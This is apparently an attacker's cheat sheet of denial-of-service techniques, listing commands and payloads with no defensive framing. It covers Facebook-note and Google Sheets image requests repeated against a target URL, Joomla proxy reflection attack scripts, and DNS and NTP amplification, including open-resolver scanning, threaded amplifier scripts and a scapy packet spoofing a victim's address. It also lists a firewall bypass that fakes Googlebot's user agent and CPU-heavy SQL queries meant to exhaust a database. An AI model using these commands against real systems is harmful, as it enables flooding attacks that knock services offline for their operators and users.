.::[HTTP Authentication]::.
user:password@domain
header(user:password)

.::[Facebook note]::.
<img src=http://targetname/file?r=1></img>
<img src=http://targetname/file?r=1></img>
..
<img src=http://targetname/file?r=1000></img>

.::[GoogleSheet]::.
=image("http://targetname/file.pdf?r=0")
=image("http://targetname/file.pdf?r=1")
...
=image("http://targetname/file.pdf?r=1000")

.::[Joomla Reflection]::.
http://my-website.com/plugins/system/plugin_googlemap2_proxy.php?url=
python JoomlaReflection_Scan.py 1 255 5 joomla.txt
python JoomlaReflection_Attack.py http://google.com/ joomla.txt 5

.::[DNS Amplification]::.
perl find_open_resolvers.pl '1.0.0.0 - 1.84.255.255' -q 1000
dig ANY isc.org @samsung.idv.tw
python amplfiy.py -t target -s open_dns.txt -a domain_name.txt -c -1 --verify -v --threads=1000

.::[Crawler]::.
http://www.80legs.com/
https://ahrefs.com/

.::[DNP firewall]::.
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Referer:

.::[NTP Amplification]::.
ntpdos.py IP "NTPlist.txt" Threads
nmap -sU -pU:123 -Pn -n --script=ntp-monlist target

.::[DNS Amplification]::.
nmap -sU -p 53 -sV -P0 --script "dns-recursion" 1.1.1.1/24
sr1(IP(src="victim ip), dst="192.168.5.1")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.slashdot.org")))

.::[SQL]::.
_[()_%/%a?F%_D)_(F%)_%([)({}%){()}£$&N%_)$*£()$*R"_)][%](%[x])%a][$*"£$-9]_
select tab1 from (select decode(encode(convert(compress(post) using latin1),concat(post,post,post,post)),sha1(concat(post,post,post,post))) as tab1 from table_1)a;
select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a;